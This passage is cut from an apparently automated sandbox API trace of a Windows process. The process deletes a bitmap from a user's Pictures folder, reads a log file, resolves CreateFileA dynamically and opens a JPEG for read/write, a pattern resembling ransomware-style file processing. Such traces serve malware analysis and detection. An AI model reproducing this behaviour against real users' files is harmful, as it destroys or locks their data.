nFileSizeLow=0xc3db, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 0x90af58 [0191.667] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdzhtnrtuaafiidk.bmp")) returned 1 [0191.669] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0x176fed20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 0 [0191.669] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.675] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.676] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.676] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x326f, lpOverlapped=0x0) returned 1 [0191.676] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x326f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.679] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.679] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.679] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.679] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.679] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.679] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.682] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fd0 [0191.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.683] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0191.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.683] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0191.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0191.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", cchWideChar=48, lpMultiByteStr=0x9bf310, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpUsedDefaultChar=0x0) returned 48 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.684] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xslu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=48, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0191.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=48, 